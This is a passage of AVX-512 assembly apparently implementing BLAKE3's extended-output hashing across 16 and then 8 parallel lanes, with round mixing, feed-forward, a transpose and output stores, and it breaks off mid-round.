vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm28
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm26
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm22
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm31
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
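// Feed-forward for extended output: the low half XORs the high half, and
// the high half XORs the broadcast input CV, yielding 64 bytes per lane.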
vpxord zmm0,zmm0,zmm8
vpxord zmm1,zmm1,zmm9
vpxord zmm2,zmm2,zmm10
vpxord zmm3,zmm3,zmm11
vpxord zmm4,zmm4,zmm12
vpxord zmm5,zmm5,zmm13
vpxord zmm6,zmm6,zmm14
vpxord zmm7,zmm7,zmm15
vpxord zmm8,zmm8,DWORD PTR [rdi]{1to16}
vpxord zmm9,zmm9,DWORD PTR [rdi+0x4]{1to16}
vpxord zmm10,zmm10,DWORD PTR [rdi+0x8]{1to16}
vpxord zmm11,zmm11,DWORD PTR [rdi+0xc]{1to16}
vpxord zmm12,zmm12,DWORD PTR [rdi+0x10]{1to16}
vpxord zmm13,zmm13,DWORD PTR [rdi+0x14]{1to16}
vpxord zmm14,zmm14,DWORD PTR [rdi+0x18]{1to16}
vpxord zmm15,zmm15,DWORD PTR [rdi+0x1c]{1to16}
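// Transpose the 16x16 matrix of state words so each lane's 64-byte output
// block becomes contiguous, then store all 16 blocks (0x400 bytes).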
vpunpckldq zmm16,zmm0,zmm1
vpunpckhdq zmm17,zmm0,zmm1
vpunpckldq zmm18,zmm2,zmm3
vpunpckhdq zmm19,zmm2,zmm3
vpunpckldq zmm20,zmm4,zmm5
vpunpckhdq zmm21,zmm4,zmm5
vpunpckldq zmm22,zmm6,zmm7
vpunpckhdq zmm23,zmm6,zmm7
vpunpckldq zmm24,zmm8,zmm9
vpunpckhdq zmm25,zmm8,zmm9
vpunpckldq zmm26,zmm10,zmm11
vpunpckhdq zmm27,zmm10,zmm11
vpunpckldq zmm28,zmm12,zmm13
vpunpckhdq zmm29,zmm12,zmm13
vpunpckldq zmm30,zmm14,zmm15
vpunpckhdq zmm31,zmm14,zmm15
vpunpcklqdq zmm0,zmm16,zmm18
vpunpckhqdq zmm1,zmm16,zmm18
vpunpcklqdq zmm2,zmm17,zmm19
vpunpckhqdq zmm3,zmm17,zmm19
vpunpcklqdq zmm4,zmm20,zmm22
vpunpckhqdq zmm5,zmm20,zmm22
vpunpcklqdq zmm6,zmm21,zmm23
vpunpckhqdq zmm7,zmm21,zmm23
vpunpcklqdq zmm8,zmm24,zmm26
vpunpckhqdq zmm9,zmm24,zmm26
vpunpcklqdq zmm10,zmm25,zmm27
vpunpckhqdq zmm11,zmm25,zmm27
vpunpcklqdq zmm12,zmm28,zmm30
vpunpckhqdq zmm13,zmm28,zmm30
vpunpcklqdq zmm14,zmm29,zmm31
vpunpckhqdq zmm15,zmm29,zmm31
vshufi32x4 zmm16,zmm0,zmm4,0x88
vshufi32x4 zmm17,zmm1,zmm5,0x88
vshufi32x4 zmm18,zmm2,zmm6,0x88
vshufi32x4 zmm19,zmm3,zmm7,0x88
vshufi32x4 zmm20,zmm0,zmm4,0xdd
vshufi32x4 zmm21,zmm1,zmm5,0xdd
vshufi32x4 zmm22,zmm2,zmm6,0xdd
vshufi32x4 zmm23,zmm3,zmm7,0xdd
vshufi32x4 zmm24,zmm8,zmm12,0x88
vshufi32x4 zmm25,zmm9,zmm13,0x88
vshufi32x4 zmm26,zmm10,zmm14,0x88
vshufi32x4 zmm27,zmm11,zmm15,0x88
vshufi32x4 zmm28,zmm8,zmm12,0xdd
vshufi32x4 zmm29,zmm9,zmm13,0xdd
vshufi32x4 zmm30,zmm10,zmm14,0xdd
vshufi32x4 zmm31,zmm11,zmm15,0xdd
vshufi32x4 zmm0,zmm16,zmm24,0x88
vshufi32x4 zmm1,zmm17,zmm25,0x88
vshufi32x4 zmm2,zmm18,zmm26,0x88
vshufi32x4 zmm3,zmm19,zmm27,0x88
vshufi32x4 zmm4,zmm20,zmm28,0x88
vshufi32x4 zmm5,zmm21,zmm29,0x88
vshufi32x4 zmm6,zmm22,zmm30,0x88
vshufi32x4 zmm7,zmm23,zmm31,0x88
vshufi32x4 zmm8,zmm16,zmm24,0xdd
vshufi32x4 zmm9,zmm17,zmm25,0xdd
vshufi32x4 zmm10,zmm18,zmm26,0xdd
vshufi32x4 zmm11,zmm19,zmm27,0xdd
vshufi32x4 zmm12,zmm20,zmm28,0xdd
vshufi32x4 zmm13,zmm21,zmm29,0xdd
vshufi32x4 zmm14,zmm22,zmm30,0xdd
vshufi32x4 zmm15,zmm23,zmm31,0xdd
vmovdqu32 ZMMWORD PTR [r9],zmm0
vmovdqu32 ZMMWORD PTR [r9+0x40],zmm1
vmovdqu32 ZMMWORD PTR [r9+0x80],zmm2
vmovdqu32 ZMMWORD PTR [r9+0xc0],zmm3
vmovdqu32 ZMMWORD PTR [r9+0x100],zmm4
vmovdqu32 ZMMWORD PTR [r9+0x140],zmm5
vmovdqu32 ZMMWORD PTR [r9+0x180],zmm6
vmovdqu32 ZMMWORD PTR [r9+0x1c0],zmm7
vmovdqu32 ZMMWORD PTR [r9+0x200],zmm8
vmovdqu32 ZMMWORD PTR [r9+0x240],zmm9
vmovdqu32 ZMMWORD PTR [r9+0x280],zmm10
vmovdqu32 ZMMWORD PTR [r9+0x2c0],zmm11
vmovdqu32 ZMMWORD PTR [r9+0x300],zmm12
vmovdqu32 ZMMWORD PTR [r9+0x340],zmm13
vmovdqu32 ZMMWORD PTR [r9+0x380],zmm14
vmovdqu32 ZMMWORD PTR [r9+0x3c0],zmm15
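// Advance the saved counters by 16 (ADD16, carrying into the high words)
// and loop while at least 16 output blocks remain.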
vmovdqa32 zmm0,ZMMWORD PTR [rsp]
vmovdqa32 zmm1,ZMMWORD PTR [rsp+0x40]
vpaddd zmm2,zmm0,DWORD PTR [ADD16+rip]{1to16}
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
add r9,0x400
sub r10,0x10
cmp r10,0x10
jae 3b
test r10,r10
jne 2f
9:
vzeroupper
mov rsp,rbp
pop rbp
ret
2:
test r10,0x8
je 2f
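// Eight output blocks remain: same round structure with ymm registers.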
vpbroadcastd ymm16,DWORD PTR [rsi]
vpbroadcastd ymm17,DWORD PTR [rsi+0x4]
vpbroadcastd ymm18,DWORD PTR [rsi+0x8]
vpbroadcastd ymm19,DWORD PTR [rsi+0xc]
vpbroadcastd ymm20,DWORD PTR [rsi+0x10]
vpbroadcastd ymm21,DWORD PTR [rsi+0x14]
vpbroadcastd ymm22,DWORD PTR [rsi+0x18]
vpbroadcastd ymm23,DWORD PTR [rsi+0x1c]
vpbroadcastd ymm24,DWORD PTR [rsi+0x20]
vpbroadcastd ymm25,DWORD PTR [rsi+0x24]
vpbroadcastd ymm26,DWORD PTR [rsi+0x28]
vpbroadcastd ymm27,DWORD PTR [rsi+0x2c]
vpbroadcastd ymm28,DWORD PTR [rsi+0x30]
vpbroadcastd ymm29,DWORD PTR [rsi+0x34]
vpbroadcastd ymm30,DWORD PTR [rsi+0x38]
vpbroadcastd ymm31,DWORD PTR [rsi+0x3c]
vpbroadcastd ymm0,DWORD PTR [rdi]
vpbroadcastd ymm1,DWORD PTR [rdi+0x4]
vpbroadcastd ymm2,DWORD PTR [rdi+0x8]
vpbroadcastd ymm3,DWORD PTR [rdi+0xc]
vpbroadcastd ymm4,DWORD PTR [rdi+0x10]
vpbroadcastd ymm5,DWORD PTR [rdi+0x14]
vpbroadcastd ymm6,DWORD PTR [rdi+0x18]
vpbroadcastd ymm7,DWORD PTR [rdi+0x1c]
vpbroadcastd ymm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd ymm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd ymm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd ymm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa ymm12,YMMWORD PTR [rsp]
vmovdqa ymm13,YMMWORD PTR [rsp+0x40]
vpbroadcastd ymm14,edx
vpbroadcastd ymm15,r8d
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm24
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm23
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
